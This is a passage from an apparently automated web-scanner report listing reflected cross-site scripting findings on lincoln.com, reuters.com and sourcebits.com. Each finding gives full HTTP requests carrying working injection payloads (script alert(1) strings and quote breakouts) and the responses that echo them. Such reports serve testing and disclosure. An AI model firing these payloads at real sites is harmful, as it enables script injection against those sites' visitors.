Set-Cookie: userInfo=country_code=US,region_code=DC,city=WASHINGTON,county=DISTRICTOFCOLUMBIA,zip=20001-20020+20024+20026+20029-20082+20088-20091+20097-20099+20201-20245+20250-20251+20254+20260-20262+20265-20270+20277+20289+20299+20301+20303+20306-20307+20310+20314-20319+20330+20332+20336-20340+20350+20370+20372-20376+20380+20388-20395+20398+20401-20429+20431+20433-20444+20447+20451+20453+20456+20460+20463+20468-20472+20500-20510+20515+20520-20527+20530-20560+20565-20566+20570-20581+20585-20586+20590-20599; path=/; domain=.lincoln.com
Content-Length: 108999

<!doctype html>


<html>
<head>
<link rel="shortcut icon" type="image/x-icon" href="/resources/lincoln/general/img/favicon.ico">
<scrip
...[SNIP]...
_params.segment = "crossovers";
__params.baseURL = "http://www.lincoln.com";
__params.canonicalURL = "/crossovers/mkx/";
__params.anchorPage = "page";
__params.bannerid = "5383750|62420317|419606628964f";alert(1)//88a261e764f";
__params.referrer = "AmericaOnline(AOL)";
__params.domain="lincoln.com";
</script>
...[SNIP]...

1.13. http://www.lincoln.com/crossovers/mkx/experiencemkx/ [referrer parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lincoln.com
Path:	/crossovers/mkx/experiencemkx/

Issue detail

The value of the referrer request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload df0db"%3balert(1)//d957a900dd7 was submitted in the referrer parameter. This input was echoed as df0db";alert(1)//d957a900dd7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /crossovers/mkx/experiencemkx/?bannerid=5383750|62420317|41960662&referrer=AmericaOnline(AOL)df0db"%3balert(1)//d957a900dd7 HTTP/1.1
Host: www.lincoln.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.35 Apache/2.0.47
X-Akamai-GTMO: NGBS
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Cache-Control: max-age=86400
Expires: Sat, 21 May 2011 21:48:38 GMT
Date: Fri, 20 May 2011 21:48:38 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: userInfo=country_code=US,region_code=DC,city=WASHINGTON,county=DISTRICTOFCOLUMBIA,zip=20001-20020+20024+20026+20029-20082+20088-20091+20097-20099+20201-20245+20250-20251+20254+20260-20262+20265-20270+20277+20289+20299+20301+20303+20306-20307+20310+20314-20319+20330+20332+20336-20340+20350+20370+20372-20376+20380+20388-20395+20398+20401-20429+20431+20433-20444+20447+20451+20453+20456+20460+20463+20468-20472+20500-20510+20515+20520-20527+20530-20560+20565-20566+20570-20581+20585-20586+20590-20599; path=/; domain=.lincoln.com
Content-Length: 108970

<!doctype html>


<html>
<head>
<link rel="shortcut icon" type="image/x-icon" href="/resources/lincoln/general/img/favicon.ico">
<scrip
...[SNIP]...
aseURL = "http://www.lincoln.com";
__params.canonicalURL = "/crossovers/mkx/";
__params.anchorPage = "page";
__params.bannerid = "5383750|62420317|41960662";
__params.referrer = "AmericaOnline(AOL)df0db";alert(1)//d957a900dd7";
__params.domain="lincoln.com";
</script>
...[SNIP]...

1.14. http://www.reuters.com/assets/sharedModuleJS [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.reuters.com
Path:	/assets/sharedModuleJS

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload f070f<script>alert(1)</script>d9941c5525a was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /assets/sharedModuleJS?view=RSM-NavFlyoutContent2&globalJSVariable=&callback=Reuters.nav.callback2f070f<script>alert(1)</script>d9941c5525a&sp= HTTP/1.1
Host: www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: commerceSurveyCheckEventAdded=true; tns=dataSource=cookie

Response

HTTP/1.1 200 OK
Date: Sat, 21 May 2011 12:38:10 GMT
Server: Apache-Coyote/1.1
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 5892

Reuters.nav.callback2f070f<script>alert(1)</script>d9941c5525a('<div class="section"> <div class="sectionContent"><div class="sectionColumns"><div class="column1"><div id="navigationIndustries" class=
...[SNIP]...

1.15. http://www.reuters.com/assets/sharedModuleJS [sp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.reuters.com
Path:	/assets/sharedModuleJS

Issue detail

The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb576"><script>alert(1)</script>d35ed92e5f7 was submitted in the sp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /assets/sharedModuleJS?view=RSM-NavFlyoutContent2&globalJSVariable=&callback=Reuters.nav.callback2&sp=bb576"><script>alert(1)</script>d35ed92e5f7 HTTP/1.1
Host: www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: commerceSurveyCheckEventAdded=true; tns=dataSource=cookie

Response

HTTP/1.1 200 OK
Date: Sat, 21 May 2011 12:38:17 GMT
Server: Apache-Coyote/1.1
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 8001

Reuters.nav.callback2('<div class="section"> <div class="sectionContent"><div class="sectionColumns"><div class="column1"><div id="navigationIndustries" class="module"> <div class="moduleBody"> <div
...[SNIP]...
<a href="bb576"><script>alert(1)</script>d35ed92e5f7/sectors/energy">
...[SNIP]...

1.16. http://www.sourcebits.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 565bd<script>alert(1)</script>4880f07d5a7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?565bd<script>alert(1)</script>4880f07d5a7=1 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:03 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Set-Cookie: PHPSESSID=r583tf7ub8lf1h6tc0sn5kp6p3; path=/
Set-Cookie: X-Mapping-nbhajkek=658963BFC10F024A8FB365B882AB799B; path=/
Content-Length: 28611

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/?565bd<script>alert(1)</script>4880f07d5a7=1</h2>
...[SNIP]...

1.17. http://www.sourcebits.com/android [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/android

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 939b8<script>alert(1)</script>f5186c06a54 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /android939b8<script>alert(1)</script>f5186c06a54 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:52 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28629

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/android939b8<script>alert(1)</script>f5186c06a54</h2>
...[SNIP]...

1.18. http://www.sourcebits.com/android [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/android

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload bec13<script>alert(1)</script>51c9202787e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /android?bec13<script>alert(1)</script>51c9202787e=1 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:21 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28639

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/android?bec13<script>alert(1)</script>51c9202787e=1</h2>
...[SNIP]...

1.19. http://www.sourcebits.com/blackberry [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/blackberry

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 53423<script>alert(1)</script>59d8c2697a2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blackberry53423<script>alert(1)</script>59d8c2697a2 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:56:04 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28641

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/blackberry53423<script>alert(1)</script>59d8c2697a2</h2>
...[SNIP]...

1.20. http://www.sourcebits.com/blackberry [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/blackberry

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4fb3d<script>alert(1)</script>e20f5e6181b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blackberry?4fb3d<script>alert(1)</script>e20f5e6181b=1 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:33 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28651

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/blackberry?4fb3d<script>alert(1)</script>e20f5e6181b=1</h2>
...[SNIP]...

1.21. http://www.sourcebits.com/css/404.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/css/404.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 68854<script>alert(1)</script>51e37141995 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css68854<script>alert(1)</script>51e37141995/404.css?1292234335 HTTP/1.1
Host: www.sourcebits.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/?565bd%3Cscript%3Ealert(document.location)%3C/script%3E4880f07d5a7=1
Cookie: PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:51:06 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28670

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/css68854<script>alert(1)</script>51e37141995/404.css?1292234335</h2>
...[SNIP]...

1.22. http://www.sourcebits.com/css/404.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/css/404.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d16d"><script>alert(1)</script>d0e0fc3dcca was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css3d16d"><script>alert(1)</script>d0e0fc3dcca/404.css?1292234335 HTTP/1.1
Host: www.sourcebits.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/?565bd%3Cscript%3Ealert(document.location)%3C/script%3E4880f07d5a7=1
Cookie: PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:51:04 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28678

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/css3d16d"><script>alert(1)</script>d0e0fc3dcca/404.css?1292234335" />
...[SNIP]...

1.23. http://www.sourcebits.com/css/404.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/css/404.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 88dd0<script>alert(1)</script>46ed298eda0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/404.css88dd0<script>alert(1)</script>46ed298eda0?1292234335 HTTP/1.1
Host: www.sourcebits.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/?565bd%3Cscript%3Ealert(document.location)%3C/script%3E4880f07d5a7=1
Cookie: PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:51:18 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28648

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/css/404.css88dd0<script>alert(1)</script>46ed298eda0?1292234335</h2>
...[SNIP]...

1.24. http://www.sourcebits.com/css/404.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/css/404.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae49e"><script>alert(1)</script>0ac57c054c1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/404.cssae49e"><script>alert(1)</script>0ac57c054c1?1292234335 HTTP/1.1
Host: www.sourcebits.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/?565bd%3Cscript%3Ealert(document.location)%3C/script%3E4880f07d5a7=1
Cookie: PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:51:16 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/css/404.cssae49e"><script>alert(1)</script>0ac57c054c1?1292234335" />
...[SNIP]...

1.25. http://www.sourcebits.com/css/colorbox.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/css/colorbox.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74c7d"><script>alert(1)</script>8657e0fbadd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css74c7d"><script>alert(1)</script>8657e0fbadd/colorbox.css?1292234336 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/design
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:17 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28693

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/css74c7d"><script>alert(1)</script>8657e0fbadd/colorbox.css?1292234336" />
...[SNIP]...

1.26. http://www.sourcebits.com/css/colorbox.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/css/colorbox.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1f2b7<script>alert(1)</script>3ec9084c37a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css1f2b7<script>alert(1)</script>3ec9084c37a/colorbox.css?1292234336 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/design
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:19 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28685

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/css1f2b7<script>alert(1)</script>3ec9084c37a/colorbox.css?1292234336</h2>
...[SNIP]...

1.27. http://www.sourcebits.com/css/colorbox.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/css/colorbox.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3945b<script>alert(1)</script>5c1e51610db was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/colorbox.css3945b<script>alert(1)</script>5c1e51610db?1292234336 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/design
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
